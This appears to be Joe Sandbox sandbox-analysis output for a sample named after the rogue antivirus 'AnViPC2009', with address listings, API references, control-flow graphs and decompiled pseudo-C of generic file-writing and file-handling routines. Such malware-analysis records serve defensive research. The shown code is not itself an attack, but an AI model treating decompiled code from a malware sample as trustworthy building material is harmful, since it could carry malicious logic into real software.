                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c303
                                                                                                                                                      0x0040c303
                                                                                                                                                      0x0040c30a
                                                                                                                                                      0x0040c310
                                                                                                                                                      0x0040c317
                                                                                                                                                      0x0040c319
                                                                                                                                                      0x0040c319
                                                                                                                                                      0x0040c320
                                                                                                                                                      0x0040c325
                                                                                                                                                      0x0040c32a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c330
                                                                                                                                                      0x0040c330
                                                                                                                                                      0x0040c330
                                                                                                                                                      0x0040c332
                                                                                                                                                      0x0040c334
                                                                                                                                                      0x0040c3ea
                                                                                                                                                      0x0040c3ea
                                                                                                                                                      0x0040c3ec
                                                                                                                                                      0x0040c350
                                                                                                                                                      0x0040c358
                                                                                                                                                      0x0040c35d
                                                                                                                                                      0x0040c35f
                                                                                                                                                      0x0040c366
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x0040c36d
                                                                                                                                                      0x0040c36f
                                                                                                                                                      0x0040c373
                                                                                                                                                      0x0040c375
                                                                                                                                                      0x0040c375
                                                                                                                                                      0x0040c373
                                                                                                                                                      0x0040c380
                                                                                                                                                      0x0040c38c
                                                                                                                                                      0x0040c39c
                                                                                                                                                      0x0040c3a6
                                                                                                                                                      0x0040c3b5
                                                                                                                                                      0x0040c3bb
                                                                                                                                                      0x0040c3c3
                                                                                                                                                      0x0040c3c8
                                                                                                                                                      0x0040c3ca
                                                                                                                                                      0x0040c3df
                                                                                                                                                      0x0040c3df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c3ca
                                                                                                                                                      0x0040c3f2
                                                                                                                                                      0x0040c3f2
                                                                                                                                                      0x0040c3f4
                                                                                                                                                      0x0040c400
                                                                                                                                                      0x0040c400
                                                                                                                                                      0x0040c412
                                                                                                                                                      0x0040c418
                                                                                                                                                      0x0040c41a
                                                                                                                                                      0x0040c420
                                                                                                                                                      0x0040c427
                                                                                                                                                      0x0040c435
                                                                                                                                                      0x0040c43c
                                                                                                                                                      0x0040c445
                                                                                                                                                      0x0040c445
                                                                                                                                                      0x0040c44b
                                                                                                                                                      0x0040c452
                                                                                                                                                      0x0040c454
                                                                                                                                                      0x0040c45b
                                                                                                                                                      0x0040c460
                                                                                                                                                      0x0040c466
                                                                                                                                                      0x0040c467
                                                                                                                                                      0x0040c46b
                                                                                                                                                      0x0040c479
                                                                                                                                                      0x0040c479
                                                                                                                                                      0x0040c46b
                                                                                                                                                      0x0040c484
                                                                                                                                                      0x0040c486
                                                                                                                                                      0x0040c492
                                                                                                                                                      0x0040c494
                                                                                                                                                      0x0040c49a
                                                                                                                                                      0x0040c4a8
                                                                                                                                                      0x0040c4a8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c49a
                                                                                                                                                      0x0040c3f6
                                                                                                                                                      0x0040c3f6
                                                                                                                                                      0x0040c3fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c3fa
                                                                                                                                                      0x0040c33a
                                                                                                                                                      0x0040c33a
                                                                                                                                                      0x0040c33e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c344
                                                                                                                                                      0x0040c344
                                                                                                                                                      0x0040c347
                                                                                                                                                      0x0040c34a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c34a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4b2
                                                                                                                                                      0x0040c4b2
                                                                                                                                                      0x0040c4b3
                                                                                                                                                      0x0040c4b8
                                                                                                                                                      0x0040c4ba
                                                                                                                                                      0x0040c4bd
                                                                                                                                                      0x0040c4bd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4f3
                                                                                                                                                      0x0040c4f3
                                                                                                                                                      0x0040c4fa
                                                                                                                                                      0x0040c4fa
                                                                                                                                                      0x0040c4fd
                                                                                                                                                      0x0040c52a
                                                                                                                                                      0x0040c52a
                                                                                                                                                      0x0040c531
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c531
                                                                                                                                                      0x0040c4ff
                                                                                                                                                      0x0040c4ff
                                                                                                                                                      0x0040c4ff
                                                                                                                                                      0x0040c502
                                                                                                                                                      0x0040c517
                                                                                                                                                      0x0040c517
                                                                                                                                                      0x0040c51e
                                                                                                                                                      0x0040c51e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c51e
                                                                                                                                                      0x0040c504
                                                                                                                                                      0x0040c504
                                                                                                                                                      0x0040c504
                                                                                                                                                      0x0040c505
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c507
                                                                                                                                                      0x0040c507
                                                                                                                                                      0x0040c507
                                                                                                                                                      0x0040c508
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c50e
                                                                                                                                                      0x0040c50e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c50e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c57f
                                                                                                                                                      0x0040c57f
                                                                                                                                                      0x0040c583
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c589
                                                                                                                                                      0x0040c589
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c59b
                                                                                                                                                      0x0040c59b
                                                                                                                                                      0x0040c59f
                                                                                                                                                      0x0040c6fe
                                                                                                                                                      0x0040c6fe
                                                                                                                                                      0x0040c702
                                                                                                                                                      0x0040c708
                                                                                                                                                      0x0040c70f
                                                                                                                                                      0x0040c711
                                                                                                                                                      0x0040c711
                                                                                                                                                      0x0040c71b
                                                                                                                                                      0x0040c71b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c702
                                                                                                                                                      0x0040c5a5
                                                                                                                                                      0x0040c5b1
                                                                                                                                                      0x0040c5be
                                                                                                                                                      0x0040c5c3
                                                                                                                                                      0x0040c5c7
                                                                                                                                                      0x0040c5c9
                                                                                                                                                      0x0040c5d6
                                                                                                                                                      0x0040c5d6
                                                                                                                                                      0x0040c5d6
                                                                                                                                                      0x0040c5dc
                                                                                                                                                      0x0040c5e2
                                                                                                                                                      0x0040c5e3
                                                                                                                                                      0x0040c5e9
                                                                                                                                                      0x0040c5ea
                                                                                                                                                      0x0040c5eb
                                                                                                                                                      0x0040c5ed
                                                                                                                                                      0x0040c5f0
                                                                                                                                                      0x0040c5f6
                                                                                                                                                      0x0040c5f7
                                                                                                                                                      0x0040c5f9
                                                                                                                                                      0x0040c5fc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d3
                                                                                                                                                      0x0040c5d3
                                                                                                                                                      0x0040c5fe
                                                                                                                                                      0x0040c60a
                                                                                                                                                      0x0040c610
                                                                                                                                                      0x0040c617
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c61d
                                                                                                                                                      0x0040c61d
                                                                                                                                                      0x0040c624
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c62a
                                                                                                                                                      0x0040c62c
                                                                                                                                                      0x0040c633
                                                                                                                                                      0x0040c63a
                                                                                                                                                      0x0040c63f
                                                                                                                                                      0x0040c641
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x0040c688
                                                                                                                                                      0x0040c691
                                                                                                                                                      0x0040c69d
                                                                                                                                                      0x0040c6ab
                                                                                                                                                      0x0040c6ab
                                                                                                                                                      0x0040c6b7
                                                                                                                                                      0x0040c6c5
                                                                                                                                                      0x0040c6cf
                                                                                                                                                      0x0040c6d6
                                                                                                                                                      0x0040c6dc
                                                                                                                                                      0x0040c6df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c6e5
                                                                                                                                                      0x0040c6e5
                                                                                                                                                      0x0040c6e7
                                                                                                                                                      0x0040c6e7
                                                                                                                                                      0x0040c6ec
                                                                                                                                                      0x0040c6f3
                                                                                                                                                      0x0040c6f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c6f8
                                                                                                                                                      0x0040c6df
                                                                                                                                                      0x0040c643
                                                                                                                                                      0x0040c643
                                                                                                                                                      0x0040c645
                                                                                                                                                      0x0040c64c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c64e
                                                                                                                                                      0x0040c64e
                                                                                                                                                      0x0040c64e
                                                                                                                                                      0x0040c656
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c658
                                                                                                                                                      0x0040c658
                                                                                                                                                      0x0040c659
                                                                                                                                                      0x0040c661
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c663
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c663
                                                                                                                                                      0x0040c665
                                                                                                                                                      0x0040c66d
                                                                                                                                                      0x0040c674
                                                                                                                                                      0x0040c679
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c727
                                                                                                                                                      0x0040c727
                                                                                                                                                      0x0040c72b
                                                                                                                                                      0x0040c72d
                                                                                                                                                      0x0040c734
                                                                                                                                                      0x0040c740
                                                                                                                                                      0x0040c740
                                                                                                                                                      0x0040c746
                                                                                                                                                      0x0040c74e
                                                                                                                                                      0x0040c74e
                                                                                                                                                      0x0040c753
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c75f
                                                                                                                                                      0x0040c75f
                                                                                                                                                      0x0040c763
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c769
                                                                                                                                                      0x0040c769
                                                                                                                                                      0x0040c58b
                                                                                                                                                      0x0040c591
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c9ff
                                                                                                                                                      0x0040c9ff
                                                                                                                                                      0x0040ca03
                                                                                                                                                      0x0040ca05
                                                                                                                                                      0x0040ca05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c53d
                                                                                                                                                      0x0040c53d
                                                                                                                                                      0x0040c545
                                                                                                                                                      0x0040c54a
                                                                                                                                                      0x0040c54d
                                                                                                                                                      0x0040c573
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x0040c552
                                                                                                                                                      0x0040c567
                                                                                                                                                      0x0040c554
                                                                                                                                                      0x0040c554
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c552
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bfe1
                                                                                                                                                      0x0040bfe5
                                                                                                                                                      0x0040bfea
                                                                                                                                                      0x0040bff1
                                                                                                                                                      0x0040bff1
                                                                                                                                                      0x0040bff4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bff6
                                                                                                                                                      0x0040bff6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bff6
                                                                                                                                                      0x0040bff4
                                                                                                                                                      0x0040ca3e
                                                                                                                                                      0x0040ca3e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c96c
                                                                                                                                                      0x0040c95d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c7de

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A229: OemToCharBuffA.USER32 ref: 0040A237
                                                                                                                                                        • Part of subcall function 0040A229: CharUpperA.USER32(00000000,?,?,0040B516,?,00000000,00000000,?,00000000,00000000), ref: 0040A242
                                                                                                                                                        • Part of subcall function 0040A229: CharToOemBuffA.USER32 ref: 0040A255
                                                                                                                                                      • SHChangeNotify.SHELL32(00001000,00000001,00000000,00000000), ref: 0040C9F7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Char$Buff$ChangeNotifyUpper
                                                                                                                                                      • String ID: $"$.lnk$/$/
                                                                                                                                                      • API String ID: 3722132714-4221205064
                                                                                                                                                      • Opcode ID: c55b7e8dda2562b24a93f1718546e23da6adaab37b26da7acaf48b5a52746ddb
                                                                                                                                                      • Instruction ID: a4d3239ebe4490c6aff351d4846f84b65a7147a2e5ed10d2cb0a18c9f290a8ce
                                                                                                                                                      • Opcode Fuzzy Hash: c55b7e8dda2562b24a93f1718546e23da6adaab37b26da7acaf48b5a52746ddb
                                                                                                                                                      • Instruction Fuzzy Hash: 0171617290525CA9EB21E7B0CD85FDAB7BC9B44304F0445E7A148F61C2DB78AB88CF59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1424 40554c-405557 1425 40564c-40564e 1424->1425 1426 40555d-405562 1424->1426 1427 405564-405565 1426->1427 1428 405579-405580 1426->1428 1430 405567-405568 1427->1430 1431 40556e 1427->1431 1429 405581-405589 1428->1429 1434 4055c8-4055dd WriteFile 1429->1434 1435 40558b-40558e 1429->1435 1430->1428 1432 40556a-40556c 1430->1432 1433 405570-405576 GetStdHandle 1431->1433 1432->1433 1433->1428 1438 4055df-4055e1 1434->1438 1436 405590-40559c 1435->1436 1437 4055e3-4055e7 1435->1437 1439 4055a0-4055b9 WriteFile 1436->1439 1440 40559e 1436->1440 1441 405646-40564b 1437->1441 1442 4055e9-4055ed 1437->1442 1438->1437 1438->1441 1439->1437 1443 4055bb-4055c4 1439->1443 1440->1439 1441->1425 1442->1441 1444 4055ef-405603 call 4032c5 1442->1444 1443->1436 1446 4055c6 1443->1446 1448 405605-40560b 1444->1448 1449 405639-405641 call 403432 1444->1449 1446->1438 1448->1429 1450 405611-405613 1448->1450 1449->1441 1450->1429 1452 405619-405634 call 404fa3 call 4054b4 1450->1452 1452->1429
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E0040554C(void* __ecx, void* __edx, void* _a4, long _a8) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				int _t26;
                                                                                                                                                      				long _t32;
                                                                                                                                                      				int _t35;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				long _t48;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      				struct _OVERLAPPED* _t55;
                                                                                                                                                      				void* _t60;
                                                                                                                                                      
                                                                                                                                                      				_t53 = __edx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t60 = __ecx;
                                                                                                                                                      				if(_a8 == 0) {
                                                                                                                                                      					L25:
                                                                                                                                                      					return _t24;
                                                                                                                                                      				}
                                                                                                                                                      				_t24 =  *(__ecx + 0xc);
                                                                                                                                                      				if(_t24 == 0) {
                                                                                                                                                      					L7:
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t55 = 0;
                                                                                                                                                      						_v8 = 0;
                                                                                                                                                      						if( *((intOrPtr*)(_t60 + 0xc)) == 0) {
                                                                                                                                                      							goto L15;
                                                                                                                                                      						}
                                                                                                                                                      						if(_a8 <= 0) {
                                                                                                                                                      							L17:
                                                                                                                                                      							if( *((char*)(_t60 + 0x14)) == 0 ||  *((intOrPtr*)(_t60 + 0xc)) != 0) {
                                                                                                                                                      								L24:
                                                                                                                                                      								 *((char*)(_t60 + 8)) = 1;
                                                                                                                                                      								goto L25;
                                                                                                                                                      							} else {
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_t18 = _t60 + 0x17; // 0x17
                                                                                                                                                      								if(E004032C5(0x414c7c, _t18) == 0) {
                                                                                                                                                      									_t22 = _t60 + 0x17; // 0x17
                                                                                                                                                      									_t24 = E00403432(0x414c7c, 0, _t22);
                                                                                                                                                      									goto L24;
                                                                                                                                                      								}
                                                                                                                                                      								_t19 =  &_v8; // 0x9454529
                                                                                                                                                      								_t24 =  *_t19;
                                                                                                                                                      								if(_t24 < _a8 && _t24 > 0) {
                                                                                                                                                      									_t38 = E00404FA3(_t60, _t53);
                                                                                                                                                      									_t21 =  &_v8; // 0x9454529
                                                                                                                                                      									asm("sbb edx, edi");
                                                                                                                                                      									_t24 = E004054B4(_t60, _t38 -  *_t21, _t53, 0);
                                                                                                                                                      								}
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L10;
                                                                                                                                                      						}
                                                                                                                                                      						while(1) {
                                                                                                                                                      							L10:
                                                                                                                                                      							_t48 = _a8 - _t55;
                                                                                                                                                      							_t32 = 0x4000;
                                                                                                                                                      							if(_t48 < 0x4000) {
                                                                                                                                                      								_t32 = _t48;
                                                                                                                                                      							}
                                                                                                                                                      							_t8 =  &_v8; // 0x9454529
                                                                                                                                                      							_t35 = WriteFile( *(_t60 + 4), _a4 + _t55, _t32, _t8, 0);
                                                                                                                                                      							asm("sbb al, al");
                                                                                                                                                      							_t24 =  ~(_t35 - 1) + 1;
                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                      								goto L17;
                                                                                                                                                      							}
                                                                                                                                                      							_t55 = _t55 + 0x4000;
                                                                                                                                                      							if(_t55 < _a8) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      							L16:
                                                                                                                                                      							if(_t24 != 0) {
                                                                                                                                                      								goto L24;
                                                                                                                                                      							}
                                                                                                                                                      							goto L17;
                                                                                                                                                      						}
                                                                                                                                                      						goto L17;
                                                                                                                                                      						L15:
                                                                                                                                                      						_t12 =  &_v8; // 0x9454529
                                                                                                                                                      						_t26 = WriteFile( *(_t60 + 4), _a4, _a8, _t12, 0); // executed
                                                                                                                                                      						asm("sbb al, al");
                                                                                                                                                      						_t24 =  ~(_t26 - 1) + 1;
                                                                                                                                                      						goto L16;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t40 = _t24 - 1;
                                                                                                                                                      				if(_t40 == 0) {
                                                                                                                                                      					_t24 = GetStdHandle(0xfffffff5);
                                                                                                                                                      					L6:
                                                                                                                                                      					 *(_t60 + 4) = _t24;
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      				_t24 = _t40 - 1;
                                                                                                                                                      				if(_t24 != 0) {
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      				_t24 = GetStdHandle(0xfffffff4);
                                                                                                                                                      				goto L6;
                                                                                                                                                      			}














                                                                                                                                                      0x0040554c
                                                                                                                                                      0x0040554f
                                                                                                                                                      0x00405555
                                                                                                                                                      0x00405557
                                                                                                                                                      0x0040564c
                                                                                                                                                      0x0040564e
                                                                                                                                                      0x0040564e
                                                                                                                                                      0x0040555d
                                                                                                                                                      0x00405562
                                                                                                                                                      0x00405579
                                                                                                                                                      0x00405581
                                                                                                                                                      0x00405581
                                                                                                                                                      0x00405583
                                                                                                                                                      0x00405589
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040558e
                                                                                                                                                      0x004055e3
                                                                                                                                                      0x004055e7
                                                                                                                                                      0x00405646
                                                                                                                                                      0x00405647
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055ef
                                                                                                                                                      0x004055ef
                                                                                                                                                      0x004055f1
                                                                                                                                                      0x00405603
                                                                                                                                                      0x00405639
                                                                                                                                                      0x00405641
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405641
                                                                                                                                                      0x00405605
                                                                                                                                                      0x00405605
                                                                                                                                                      0x0040560b
                                                                                                                                                      0x0040561d
                                                                                                                                                      0x00405622
                                                                                                                                                      0x00405629
                                                                                                                                                      0x0040562f
                                                                                                                                                      0x0040562f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040560b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405590
                                                                                                                                                      0x00405590
                                                                                                                                                      0x00405593
                                                                                                                                                      0x00405595
                                                                                                                                                      0x0040559c
                                                                                                                                                      0x0040559e
                                                                                                                                                      0x0040559e
                                                                                                                                                      0x004055a2
                                                                                                                                                      0x004055b0
                                                                                                                                                      0x004055b5
                                                                                                                                                      0x004055b7
                                                                                                                                                      0x004055b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055bb
                                                                                                                                                      0x004055c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055df
                                                                                                                                                      0x004055e1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055e1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055c8
                                                                                                                                                      0x004055c9
                                                                                                                                                      0x004055d6
                                                                                                                                                      0x004055db
                                                                                                                                                      0x004055dd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055dd
                                                                                                                                                      0x00405581
                                                                                                                                                      0x00405564
                                                                                                                                                      0x00405565
                                                                                                                                                      0x00405570
                                                                                                                                                      0x00405570
                                                                                                                                                      0x00405576
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405576
                                                                                                                                                      0x00405567
                                                                                                                                                      0x00405568
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405570
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00409229,?,?,00000000,?,?,0040EAF3,?,?,09454529,?,?), ref: 00405570
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00004000,)EE*)))*))),00000000,00000000,?,00000000,00000017,00000000,?,00409229,?,?,00000000,?), ref: 004055B0
                                                                                                                                                      • WriteFile.KERNELBASE(?,?,00000000,)EE*)))*))),00000000,?,?,?,00000000,?,00409229,?,?,00000000,?,?), ref: 004055D6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite$Handle
                                                                                                                                                      • String ID: )EE*)))*)))$|LA
                                                                                                                                                      • API String ID: 4209713984-4270601557
                                                                                                                                                      • Opcode ID: d0f5307994a851aab7f8effd121e9e883381f2cf68b18a31f753ad1ba08ddf47
                                                                                                                                                      • Instruction ID: a94dca9ab147bf10715a5b3709b3ea92a05abf6cee8c8b8595d3f968f1ce7832
                                                                                                                                                      • Opcode Fuzzy Hash: d0f5307994a851aab7f8effd121e9e883381f2cf68b18a31f753ad1ba08ddf47
                                                                                                                                                      • Instruction Fuzzy Hash: 3931C171600904BBDF20CE25CD44BBB77AAEB81710F10853BA516E72C4D678AD05CF59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1457 40926c-40927f call 401200 1460 409286-40928e 1457->1460 1461 409281 call 40a386 1457->1461 1462 409290-4092ae GetModuleFileNameA call 40a3b2 1460->1462 1463 4092b5-4092e4 call 40a450 call 404e8a call 40505e 1460->1463 1461->1460 1468 4094a3-4094a5 1462->1468 1469 4092b4 1462->1469 1474 4092f6-4092fd 1463->1474 1475 4092e6-4092f1 call 40503b 1463->1475 1469->1463 1476 4092fe-409302 1474->1476 1482 4094a2 1475->1482 1478 409308-409328 call 404fa3 call 405651 1476->1478 1479 4093da-409407 call 4054b4 call 40a1c5 1476->1479 1488 40932d-409333 1478->1488 1490 409496-4094a1 call 40503b 1479->1490 1492 40940d-40942a call 405651 1479->1492 1482->1468 1488->1490 1491 409339 1488->1491 1490->1482 1495 40933b-409345 1491->1495 1500 40942c-409435 1492->1500 1501 40948d-409493 1492->1501 1498 409347-40934f 1495->1498 1499 409369-40936c 1495->1499 1498->1499 1502 409351-409367 call 40a516 1498->1502 1503 409394-40939d 1499->1503 1504 40936e-409376 1499->1504 1500->1501 1506 409437-40943a 1500->1506 1501->1490 1502->1499 1520 4093a1-4093a6 1502->1520 1503->1495 1507 40939f 1503->1507 1504->1503 1505 409378-40938e call 40a516 1504->1505 1505->1490 1505->1503 1510 409477-40947a 1506->1510 1511 40943c-409443 1506->1511 1512 4093a9-4093ca call 4054b4 1507->1512 1514 409481-409483 1510->1514 1515 40947c-40947f 1510->1515 1517 409470 1511->1517 1518 409445-409448 1511->1518 1512->1476 1529 4093d0-4093d4 1512->1529 1521 409484 1514->1521 1515->1514 1515->1521 1525 409474-409475 1517->1525 1522 40946a-40946e 1518->1522 1523 40944a-40944d 1518->1523 1520->1512 1526 409487-40948b 1521->1526 1522->1525 1527 409464-409468 1523->1527 1528 40944f-409452 1523->1528 1525->1526 1526->1500 1526->1501 1527->1525 1530 409454-409456 1528->1530 1531 40945e-409462 1528->1531 1529->1479 1529->1490 1530->1521 1532 409458-40945c 1530->1532 1531->1525 1532->1525
                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E0040926C(char __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v1040;
                                                                                                                                                      				char _v4144;
                                                                                                                                                      				char _v12336;
                                                                                                                                                      				void* _t65;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				intOrPtr _t75;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                      				intOrPtr _t80;
                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                      				char _t95;
                                                                                                                                                      				intOrPtr _t104;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				char _t111;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				void* _t117;
                                                                                                                                                      				void* _t118;
                                                                                                                                                      				void* _t119;
                                                                                                                                                      				void* _t122;
                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      
                                                                                                                                                      				_t110 = __edx;
                                                                                                                                                      				_t97 = __ecx;
                                                                                                                                                      				_t95 = __ebx;
                                                                                                                                                      				E00401200(0x302c);
                                                                                                                                                      				 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                      				_push(_a4);
                                                                                                                                                      				_t125 = __ecx;
                                                                                                                                                      				_t65 = E0040A386();
                                                                                                                                                      				_t66 =  &_v1040;
                                                                                                                                                      				if(_t65 != 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					E0040A450(_t66, _a4);
                                                                                                                                                      					E00404E8A( &_v4144);
                                                                                                                                                      					_t70 = E0040505E( &_v4144,  &_v1040, 0, 1, 0); // executed
                                                                                                                                                      					if(_t70 != 0) {
                                                                                                                                                      						_a4 = _a4 | 0xffffffff;
                                                                                                                                                      						_v8 = 0;
                                                                                                                                                      						_push(_t95);
                                                                                                                                                      						L7:
                                                                                                                                                      						while(_a4 == 0xffffffff) {
                                                                                                                                                      							_t80 = E00404FA3( &_v4144, _t110); // executed
                                                                                                                                                      							_v12 = _t80;
                                                                                                                                                      							_t82 = E00405651( &_v4144, _t110,  &_v12336, 0x2000); // executed
                                                                                                                                                      							_v16 = _t82;
                                                                                                                                                      							if(_t82 >= 0x10) {
                                                                                                                                                      								_t122 = 0;
                                                                                                                                                      								while(1) {
                                                                                                                                                      									_t95 = _t127 + _t122 - 0x302c;
